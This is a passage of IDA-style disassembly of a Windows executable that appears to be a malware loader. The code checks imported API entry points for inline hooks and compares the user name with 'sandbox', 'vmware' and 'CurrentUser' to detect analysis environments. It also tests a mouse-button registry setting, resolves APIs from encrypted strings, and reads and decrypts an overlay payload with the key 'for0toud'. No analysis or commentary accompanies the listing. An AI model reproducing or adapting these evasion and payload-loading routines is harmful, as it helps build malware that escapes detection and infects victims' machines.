mov ecx, [ebp+var_4]
mov edx, [ebp+var_8]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
jmp short loc_402977
; ---------------------------------------------------------------------------
loc_4029A4: ; CODE XREF: sub_402910:loc_40296B�j
; sub_402910+63�j ...
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn
sub_402910 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029B0 proc near ; CODE XREF: start:loc_40307F�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, dword_4052E0
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0FFFFFFE8h
jz short loc_4029D2
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 0FFFFFFE9h
jnz short loc_4029DC
loc_4029D2: ; CODE XREF: sub_4029B0+15�j
mov eax, 1
jmp loc_402C0C
; ---------------------------------------------------------------------------
loc_4029DC: ; CODE XREF: sub_4029B0+20�j
mov edx, dword_4052C0
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 0FFFFFFE8h
jz short loc_4029FB
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 0FFFFFFE9h
jnz short loc_402A05
loc_4029FB: ; CODE XREF: sub_4029B0+3E�j
mov eax, 1
jmp loc_402C0C
; ---------------------------------------------------------------------------
loc_402A05: ; CODE XREF: sub_4029B0+49�j
mov ecx, dword_405294
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 0FFFFFFE8h
jz short loc_402A24
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0FFFFFFE9h
jnz short loc_402A2E
loc_402A24: ; CODE XREF: sub_4029B0+67�j
mov eax, 1
jmp loc_402C0C
; ---------------------------------------------------------------------------
loc_402A2E: ; CODE XREF: sub_4029B0+72�j
mov eax, dword_405298
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0FFFFFFE8h
jz short loc_402A4C
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 0FFFFFFE9h
jnz short loc_402A56
loc_402A4C: ; CODE XREF: sub_4029B0+8F�j
mov eax, 1
jmp loc_402C0C
; ---------------------------------------------------------------------------
loc_402A56: ; CODE XREF: sub_4029B0+9A�j
mov edx, dword_4052A8
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 0FFFFFFE8h
jz short loc_402A75
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 0FFFFFFE9h
jnz short loc_402A7F
loc_402A75: ; CODE XREF: sub_4029B0+B8�j
mov eax, 1
jmp loc_402C0C
; ---------------------------------------------------------------------------
loc_402A7F: ; CODE XREF: sub_4029B0+C3�j
mov ecx, dword_40528C
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 0FFFFFFE8h
jz short loc_402A9E
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0FFFFFFE9h
jnz short loc_402AA8
loc_402A9E: ; CODE XREF: sub_4029B0+E1�j
mov eax, 1
jmp loc_402C0C
; ---------------------------------------------------------------------------
loc_402AA8: ; CODE XREF: sub_4029B0+EC�j
mov eax, dword_4052AC
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0FFFFFFE8h
jz short loc_402AC6
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 0FFFFFFE9h
jnz short loc_402AD0
loc_402AC6: ; CODE XREF: sub_4029B0+109�j
mov eax, 1
jmp loc_402C0C
; ---------------------------------------------------------------------------
loc_402AD0: ; CODE XREF: sub_4029B0+114�j
mov edx, dword_4052B4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 0FFFFFFE8h
jz short loc_402AEF
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 0FFFFFFE9h
jnz short loc_402AF9
loc_402AEF: ; CODE XREF: sub_4029B0+132�j
mov eax, 1
jmp loc_402C0C
; ---------------------------------------------------------------------------
loc_402AF9: ; CODE XREF: sub_4029B0+13D�j
mov ecx, dword_4052BC
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 0FFFFFFE8h
jz short loc_402B18
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0FFFFFFE9h
jnz short loc_402B22
loc_402B18: ; CODE XREF: sub_4029B0+15B�j
mov eax, 1
jmp loc_402C0C
; ---------------------------------------------------------------------------
loc_402B22: ; CODE XREF: sub_4029B0+166�j
mov eax, dword_4052E4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0FFFFFFE8h
jz short loc_402B40
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 0FFFFFFE9h
jnz short loc_402B4A
loc_402B40: ; CODE XREF: sub_4029B0+183�j
mov eax, 1
jmp loc_402C0C
; ---------------------------------------------------------------------------
loc_402B4A: ; CODE XREF: sub_4029B0+18E�j
mov edx, dword_4052D8
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 0FFFFFFE8h
jz short loc_402B69
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 0FFFFFFE9h
jnz short loc_402B73
loc_402B69: ; CODE XREF: sub_4029B0+1AC�j
mov eax, 1
jmp loc_402C0C
; ---------------------------------------------------------------------------
loc_402B73: ; CODE XREF: sub_4029B0+1B7�j
mov ecx, dword_4052D0
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 0FFFFFFE8h
jz short loc_402B92
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0FFFFFFE9h
jnz short loc_402B99
loc_402B92: ; CODE XREF: sub_4029B0+1D5�j
mov eax, 1
jmp short loc_402C0C
; ---------------------------------------------------------------------------
loc_402B99: ; CODE XREF: sub_4029B0+1E0�j
mov eax, dword_405290
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0FFFFFFE8h
jz short loc_402BB7
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 0FFFFFFE9h
jnz short loc_402BBE
loc_402BB7: ; CODE XREF: sub_4029B0+1FA�j
mov eax, 1
jmp short loc_402C0C
; ---------------------------------------------------------------------------
loc_402BBE: ; CODE XREF: sub_4029B0+205�j
mov edx, dword_4052F4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 0FFFFFFE8h
jz short loc_402BDD
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 0FFFFFFE9h
jnz short loc_402BE4
loc_402BDD: ; CODE XREF: sub_4029B0+220�j
mov eax, 1
jmp short loc_402C0C
; ---------------------------------------------------------------------------
loc_402BE4: ; CODE XREF: sub_4029B0+22B�j
mov ecx, dword_4052B8
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 0FFFFFFE8h
jz short loc_402C03
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0FFFFFFE9h
jnz short loc_402C0A
loc_402C03: ; CODE XREF: sub_4029B0+246�j
mov eax, 1
jmp short loc_402C0C
; ---------------------------------------------------------------------------
loc_402C0A: ; CODE XREF: sub_4029B0+251�j
xor eax, eax
loc_402C0C: ; CODE XREF: sub_4029B0+27�j
; sub_4029B0+50�j ...
mov esp, ebp
pop ebp
retn
sub_4029B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C10 proc near ; CODE XREF: start+A5�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
hObject = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
mov [ebp+var_18], 0
mov [ebp+var_4], 0
push 0 ; lpModuleName
call ds:GetModuleHandleA ; GetModuleHandleA
mov [ebp+hObject], eax
mov eax, [ebp+hObject]
mov [ebp+var_30], eax
mov ecx, [ebp+var_30]
mov edx, [ecx+3Ch]
mov eax, [ebp+hObject]
lea ecx, [eax+edx+4]
mov [ebp+var_20], ecx
mov edx, [ebp+var_20]
add edx, 14h
mov [ebp+var_24], edx
mov eax, [ebp+var_20]
xor ecx, ecx
mov cx, [eax+10h]
mov edx, [ebp+var_24]
add edx, ecx
mov [ebp+var_1C], edx
mov eax, [ebp+var_20]
xor ecx, ecx
mov cx, [eax+2]
sub ecx, 1
imul ecx, 28h
mov edx, [ebp+var_20]
xor eax, eax
mov ax, [edx+2]
sub eax, 1
imul eax, 28h
mov edx, [ebp+var_1C]
mov ecx, [edx+ecx+10h]
mov edx, [ebp+var_1C]
add ecx, [edx+eax+14h]
mov [ebp+var_10], ecx
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
push 0 ; dwErrCode
call ds:SetLastError
push 0
push 80h
push 3
push 0
push 1
push 80000000h
mov ecx, [ebp+arg_0]
push ecx
call dword_4052C4
mov [ebp+var_2C], eax
call ds:GetLastError
test eax, eax
jnz short loc_402CCC
cmp [ebp+var_2C], 0FFFFFFFFh
jnz short loc_402CD0
loc_402CCC: ; CODE XREF: sub_402C10+B4�j
xor al, al
jmp short loc_402D4E
; ---------------------------------------------------------------------------
loc_402CD0: ; CODE XREF: sub_402C10+BA�j
lea edx, [ebp+var_28]
push edx
mov eax, [ebp+var_2C]
push eax
call dword_4052CC
mov ecx, [ebp+var_28]
cmp ecx, [ebp+var_10]
jbe short loc_402D41
mov edx, [ebp+var_28]
sub edx, [ebp+var_10]
mov [ebp+var_18], edx
push 1
mov eax, [ebp+var_18]
add eax, 1
push eax
call sub_401000
add esp, 8
mov [ebp+var_14], eax
push 0
push 0
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_2C]
push edx
call dword_4052F8
push 0
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_18]
push ecx
mov edx, [ebp+var_14]
push edx
mov eax, [ebp+var_2C]
push eax
call dword_4052B0
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_14]
mov [ecx], edx
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_18]
mov [eax], ecx
mov [ebp+var_4], 1
loc_402D41: ; CODE XREF: sub_402C10+D4�j
mov edx, [ebp+var_2C]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
mov al, [ebp+var_4]
loc_402D4E: ; CODE XREF: sub_402C10+BE�j
mov esp, ebp
pop ebp
retn
sub_402C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402D60 proc near ; CODE XREF: sub_402E00+E1�p
; sub_402E00+102�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_8], ecx
push 1
mov eax, [ebp+var_8]
add eax, 1
push eax
call sub_401000
add esp, 8
mov [ebp+var_C], eax
mov [ebp+var_4], 0
jmp short loc_402D9F
; ---------------------------------------------------------------------------
loc_402D96: ; CODE XREF: sub_402D60:loc_402DE9�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_402D9F: ; CODE XREF: sub_402D60+34�j
mov edx, [ebp+var_4]
cmp edx, [ebp+var_8]
jge short loc_402DEB
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 41h
jl short loc_402DD9
mov edx, [ebp+arg_0]
add edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 5Ah
jg short loc_402DD9
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
add edx, 20h
mov eax, [ebp+var_C]
add eax, [ebp+var_4]
mov [eax], dl
jmp short loc_402DE9
; ---------------------------------------------------------------------------
loc_402DD9: ; CODE XREF: sub_402D60+53�j
; sub_402D60+61�j
mov ecx, [ebp+var_C]
add ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
add edx, [ebp+var_4]
mov al, [edx]
mov [ecx], al
loc_402DE9: ; CODE XREF: sub_402D60+77�j
jmp short loc_402D96
; ---------------------------------------------------------------------------
loc_402DEB: ; CODE XREF: sub_402D60+45�j
mov eax, [ebp+var_C]
pop edi
mov esp, ebp
pop ebp
retn
sub_402D60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E00 proc near ; CODE XREF: start:loc_40306A�p
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_112 = byte ptr -112h
var_111 = byte ptr -111h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
push ebp
mov ebp, esp
sub esp, 11Ch
push edi
mov [ebp+var_108], 104h
mov [ebp+var_104], 0
mov ecx, 40h
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
lea eax, [ebp+var_108]
push eax
lea ecx, [ebp+var_104]
push ecx
call dword_4052E8
mov [ebp+var_10C], offset aCurrentuser ; "CurrentUser"
lea edx, [ebp+var_104]
mov [ebp+var_110], edx
loc_402E57: ; CODE XREF: sub_402E00+A7�j
mov eax, [ebp+var_110]
mov cl, [eax]
mov [ebp+var_111], cl
mov edx, [ebp+var_10C]
cmp cl, [edx]
jnz short loc_402EB5
cmp [ebp+var_111], 0
jz short loc_402EA9
mov eax, [ebp+var_110]
mov cl, [eax+1]
mov [ebp+var_112], cl
mov edx, [ebp+var_10C]
cmp cl, [edx+1]
jnz short loc_402EB5
add [ebp+var_110], 2
add [ebp+var_10C], 2
cmp [ebp+var_112], 0
jnz short loc_402E57
loc_402EA9: ; CODE XREF: sub_402E00+76�j
mov [ebp+var_118], 0
jmp short loc_402EC0
; ---------------------------------------------------------------------------
loc_402EB5: ; CODE XREF: sub_402E00+6D�j
; sub_402E00+90�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_118], eax
loc_402EC0: ; CODE XREF: sub_402E00+B3�j
mov ecx, [ebp+var_118]
mov [ebp+var_11C], ecx
cmp [ebp+var_11C], 0
jz short loc_402F17
push offset aSandbox ; "sandbox"
lea edx, [ebp+var_104]
push edx
call sub_402D60
add esp, 4
push eax
call sub_4028A0
add esp, 8
test eax, eax
jnz short loc_402F17
push offset aVmware ; "vmware"
lea eax, [ebp+var_104]
push eax
call sub_402D60
add esp, 4
push eax
call sub_4028A0
add esp, 8
test eax, eax
jz short loc_402F1B
loc_402F17: ; CODE XREF: sub_402E00+D3�j
; sub_402E00+F4�j
mov al, 1
jmp short loc_402F1D
; ---------------------------------------------------------------------------
loc_402F1B: ; CODE XREF: sub_402E00+115�j
xor al, al
loc_402F1D: ; CODE XREF: sub_402E00+119�j
pop edi
mov esp, ebp
pop ebp
retn
sub_402E00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F30 proc near ; CODE XREF: start:loc_403055�p
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push edi
mov [ebp+var_24], 0
mov ecx, 7
xor eax, eax
lea edi, [ebp+var_23]
rep stosd
stosw
stosb
mov [ebp+var_2C], 1Fh
mov [ebp+var_4], 1
mov [ebp+var_28], 1
lea eax, [ebp+var_30]
push eax
push offset aControlPanelMo ; "Control Panel\\Mouse"
push 80000001h
call dword_4052DC
test eax, eax
jnz loc_403005
lea ecx, [ebp+var_2C]
push ecx
lea edx, [ebp+var_24]
push edx
lea eax, [ebp+var_4]
push eax
push 0
push offset aSwapmousebutto ; "SwapMouseButtons"
mov ecx, [ebp+var_30]
push ecx
call dword_4052A4
test eax, eax
jnz short loc_402FFB
mov [ebp+var_34], offset a0 ; "0"
lea edx, [ebp+var_24]
mov [ebp+var_38], edx
loc_402FA6: ; CODE XREF: sub_402F30+A8�j
mov eax, [ebp+var_38]
mov cl, [eax]
mov [ebp+var_39], cl
mov edx, [ebp+var_34]
cmp cl, [edx]
jnz short loc_402FE3
cmp [ebp+var_39], 0
jz short loc_402FDA
mov eax, [ebp+var_38]
mov cl, [eax+1]
mov [ebp+var_3A], cl
mov edx, [ebp+var_34]
cmp cl, [edx+1]
jnz short loc_402FE3
add [ebp+var_38], 2
add [ebp+var_34], 2
cmp [ebp+var_3A], 0
jnz short loc_402FA6
loc_402FDA: ; CODE XREF: sub_402F30+89�j
mov [ebp+var_40], 0
jmp short loc_402FEB
; ---------------------------------------------------------------------------
loc_402FE3: ; CODE XREF: sub_402F30+83�j
; sub_402F30+9A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_40], eax
loc_402FEB: ; CODE XREF: sub_402F30+B1�j
mov ecx, [ebp+var_40]
mov [ebp+var_44], ecx
cmp [ebp+var_44], 0
jnz short loc_402FFB
mov [ebp+var_28], 0
loc_402FFB: ; CODE XREF: sub_402F30+67�j
; sub_402F30+C5�j
mov edx, [ebp+var_30]
push edx
call dword_4052EC
loc_403005: ; CODE XREF: sub_402F30+42�j
mov al, [ebp+var_28]
pop edi
mov esp, ebp
pop ebp
retn
sub_402F30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 114h
push edi
mov [ebp+var_10C], 0
mov ecx, 40h
xor eax, eax
lea edi, [ebp+var_10B]
rep stosd
stosw
stosb
mov [ebp+var_8], 0
call sub_402150
call sub_401D60
and eax, 0FFh
test eax, eax
jnz short loc_403055
or eax, 0FFFFFFFFh
jmp loc_40311C
; ---------------------------------------------------------------------------
loc_403055: ; CODE XREF: start+3B�j
call sub_402F30
and eax, 0FFh
test eax, eax
jz short loc_40306A
xor eax, eax
jmp loc_40311C
; ---------------------------------------------------------------------------
loc_40306A: ; CODE XREF: start+51�j
call sub_402E00
and eax, 0FFh
test eax, eax
jz short loc_40307F
xor eax, eax
jmp loc_40311C
; ---------------------------------------------------------------------------
loc_40307F: ; CODE XREF: start+66�j
call sub_4029B0
test eax, eax
jz short loc_40308F
xor eax, eax
jmp loc_40311C
; ---------------------------------------------------------------------------
loc_40308F: ; CODE XREF: start+76�j
push 104h
lea eax, [ebp+var_10C]
push eax
push 0
call dword_4052C0
lea ecx, [ebp+var_114]
push ecx
lea edx, [ebp+var_4]
push edx
lea eax, [ebp+var_10C]
push eax
call sub_402C10
add esp, 0Ch
and eax, 0FFh
test eax, eax
jz short loc_40311A
mov ecx, [ebp+var_114]
push ecx
mov edx, [ebp+var_4]
push edx
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov [ebp+var_4], eax
lea eax, [ebp+var_110]
push eax
mov ecx, [ebp+var_114]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_4012B0
add esp, 0Ch
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
push eax ; int
push offset String2 ; lpString2
mov ecx, [ebp+var_110]
push ecx ; int
mov edx, [ebp+var_4]
push edx ; int
call sub_401CF0
add esp, 10h
loc_40311A: ; CODE XREF: start+B4�j
xor eax, eax
loc_40311C: ; CODE XREF: start+40�j start+55�j ...
pop edi
mov esp, ebp
pop ebp
retn
start endp
; ---------------------------------------------------------------------------
align 100h
_text ends
; Section 2. (virtual address 00004000)
; Virtual size : 00000128 ( 296.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00004000
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; HGLOBAL __stdcall GlobalAlloc(UINT uFlags, SIZE_T dwBytes)
extrn GlobalAlloc:dword ; CODE XREF: sub_401000+F�p
; DATA XREF: sub_401000+F�r
; HGLOBAL __stdcall GlobalFree(HGLOBAL hMem)
extrn GlobalFree:dword ; CODE XREF: sub_401040+7�p
; DATA XREF: sub_401040+7�r
; LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2)
extrn lstrcatA:dword ; CODE XREF: sub_4017A0+45�p
; DATA XREF: sub_4017A0+45�r
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_4018E0+12�p
; sub_401D60+19�p ...
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_401D60+3D6�p
; DATA XREF: sub_401D60+3D6�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_401D60+39�p
; sub_401D60+4D�p ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_401D60+B�p
; sub_402C10+13�p
; DATA XREF: ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_402C10+AC�p
; DATA XREF: sub_402C10+AC�r
; void __stdcall SetLastError(DWORD dwErrCode)
extrn SetLastError:dword ; CODE XREF: sub_402C10+87�p
; DATA XREF: sub_402C10+87�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_402C10+7F�p
; sub_402C10+135�p
; DATA XREF: ...
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 404028h
dd 0
dd 4054h, 2 dup(0)
dd 411Ah, 4000h, 5 dup(0)
dd 4080h, 408Eh, 409Ch, 40A8h, 40B8h, 40C6h, 40D8h, 40ECh
dd 40FCh, 410Ch, 0
dd 6C4701F8h, 6C61626Fh, 6F6C6C41h, 1FF0063h, 626F6C47h
dd 72466C61h, 6565h, 736C03BDh, 61637274h, 4174h, 6F4C0252h
dd 694C6461h, 72617262h, 4179h, 724600F8h, 694C6565h, 72617262h
dd 1A00079h, 50746547h, 41636F72h, 65726464h, 7373h, 6547017Fh
dd 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470171h, 73614C74h
dd 72724574h, 726Fh, 65530328h, 73614C74h, 72724574h, 726Fh
dd 6C430034h, 4865736Fh, 6C646E61h, 454B0065h, 4C454E52h
dd 642E3233h, 6C6Ch, 36h dup(0)
_rdata ends
; Section 3. (virtual address 00005000)
; Virtual size : 00000301 ( 769.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00005000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 405000h
aFor0toud db 'for0toud',0 ; DATA XREF: sub_402150+C�o
; sub_402150+44�o ...
align 4
; char ModuleName[]
ModuleName db 'Ήι8―' ; DATA XREF: sub_401D60+6�o
; sub_402150+7�o ...
dd 235A3818h, 84h
; char asc_405018[]
asc_405018 db 'Ό' ; DATA XREF: sub_401D60+14�o
; sub_402150+3F�o ...
db 0F8h, 2Eh, 0ADh
dd 7D0D7A11h, 0E06EF4C6h, 0
; char ProcName[]
ProcName db '' ; DATA XREF: sub_401D60+30�o
; sub_402150+AF�o ...
db 0F4h, 2Eh, 0B7h
dd 0E527701h, 0EF6DFC84h, 0
; char aB[]
aB db '' ; DATA XREF: sub_401D60+44�o
; sub_402150+E7�o ...
db 0F4h, 2Eh, 0B7h
dd 0E527701h, 0EF6DFC84h, 0C7F3h
; char aR[]
aR db '' ; DATA XREF: sub_401D60+58�o
; sub_402150+11F�o ...
db 0F8h, 28h, 8Eh
dd 234B721Bh, 0E06BD68Dh, 8BF1D3h, 0D0C1h
; char aNN[]
aNN db 'κ',9,'' ; DATA XREF: sub_401D60+6C�o
; sub_402150+157�o ...
dd 194E7719h, 0C375F581h, 0E8FECD0h, 7110F8D0h, 0
; char aSq9j8[]
aSq9j8 db 'ο9¦8' ; DATA XREF: sub_401D60+80�o
; sub_402150+18F�o ...
db 7Fh, 5Ch, 3Dh
dd 7BE289h
; char aFq9v[]
aFq9v db 'ο9’',0 ; DATA XREF: sub_401D60+94�o
; sub_402150+1C7�o ...
db 73h, 6Eh, 3Dh
dd 0FF67F387h, 0FEC5h
; char aR_0[]
aR_0 db '' ; DATA XREF: sub_401D60+A8�o
; sub_402150+1FF�o ...
db 0F8h, 28h, 97h
dd 2E5B641Ch, 0E26DD38Ch, 1992DAC2h, 0
; char aE[]
aE db '
' ; DATA XREF: sub_401D60+BC�o
; sub_402150+237�o ...
db 0F8h, 3Dh, 0A7h
dd 2C516424h, 0C171E38Dh, 1F85D2D3h, 0DDh
; char aB_0[]
aB_0 db '' ; DATA XREF: sub_401D60+D0�o
; sub_402150+26F�o ...
db 0F4h, 2Eh, 0B7h
dd 1E527701h, 0F570F59Dh, 0C7F3h
; char aB_1[]
aB_1 db '' ; DATA XREF: sub_401D60+E4�o
; sub_402150+2A7�o ...
db 0F4h, 2Eh, 0B7h
dd 1F527701h, 0E976FF9Ah, 15AFCBD5h, 0
; char aAq5[]
aAq5 db 'ο5·' ; DATA XREF: sub_401D60+F8�o
; sub_402150+2DF�o ...
dd 204C4611h, 0FF71F58Bh, 287DAFBh, 0E8D6h
; char aD[]
aD db '' ; DATA XREF: sub_401D60+10C�o
; sub_402150+317�o ...
db 0F8h, 28h, 97h
dd 2E5B641Ch, 0E26DD38Ch, 1992DAC2h, 0
; char aE_0[]
aE_0 db '
' ; DATA XREF: sub_401D60+120�o
; sub_402150+34F�o ...
db 0F8h, 2Fh, 0B6h
dd 276A7319h, 0E863F59Ah, 0
; char aF[]
aF db '' ; DATA XREF: sub_401D60+134�o
; sub_402150+387�o ...
db 0F1h, 33h, 0B0h
dd 215F5E11h, 67FC8Ch
; char aG[]
aG db '' ; DATA XREF: sub_401D60+148�o
; sub_402150+3BF�o ...
db 0F8h, 2Eh, 0AEh
dd 3B5F781Dh, 0E370C08Dh, 1E99DAD5h, 0
; char aB_2[]
aB_2 db '' ; DATA XREF: sub_401D60+15C�o
; sub_402150+3F7�o ...
db 0F4h, 2Eh, 0B7h
dd 9527701h, 67F59Ah
; char aD_1[]
aD_1 db '' ; DATA XREF: sub_401D60+198�o
; sub_402150+49F�o ...
db 0F1h, 39h, 0A6h
dd 4
; char aD_0[]
aD_0 db '' ; DATA XREF: sub_401D60+184�o
; sub_402150+42F�o ...
db 0F8h, 28h, 8Fh
dd 235F751Bh, 0E96FF9BCh, 0
; char aR_1[]
aR_1 db '' ; DATA XREF: sub_401D60+170�o
; sub_402150+467�o ...
db 0F8h, 28h, 8Fh
dd 235F751Bh, 0E96FF9BCh, 0
; char aEs0aNNuqM[]
aEs0aNNuqM db '
ι0',1Bh,'{N=γqΞΓΩ',8,'Φ',0 ; DATA XREF: sub_401D60+1AC�o
; sub_402150+4D7�o ...
align 4
; char aEs0z[]
aEs0z db '
ι0' ; DATA XREF: sub_401D60+1C0�o
; sub_402150+50F�o ...
dd 22517511h, 0FF67E298h, 0B9FFDC5h, 0DF4C2h
; char aEs0d[]
aEs0d db '
ι0' ; DATA XREF: sub_401D60+1D4�o
; sub_402150+547�o ...
dd 207D6211h, 0E970E085h, 283CCC5h, 6D10C6CAh, 7E5F3Ch
dd 0FCD8B603h, 373h
; char aFq9v_0[]
aFq9v_0 db 'ο9’',0 ; DATA XREF: sub_401D60+1E8�o
; sub_402150+57F�o ...
db 73h, 78h, 26h
dd 43F584h
; char aE_1[]
aE_1 db '
' ; DATA XREF: sub_401D60+1FC�o
; sub_402150+5B7�o ...
db 0F8h, 3Dh, 0A7h
dd 2A527F32h, 0
; char aR_2[]
aR_2 db '' ; DATA XREF: sub_401D60+224�o
; sub_402150+5EF�o ...
db 0F8h, 28h, 85h
dd 1C5B7A1Dh, 0C967EA81h, 0CEh
; char aD_2[]
aD_2 db '' ; DATA XREF: sub_401D60+210�o
; sub_402150+627�o ...
db 0F8h, 28h, 85h
dd 1F5B7A1Dh, 0F86CF987h, 0CDD3h
; char asc_4051E8[]
asc_4051E8 db 'Ά' ; DATA XREF: sub_401D60+22�o
; sub_402150+77�o ...
db 0F9h, 2Ah, 0A2h
dd 7D0D7F04h, 0E06EF4C6h, 0
; char aR_3[]
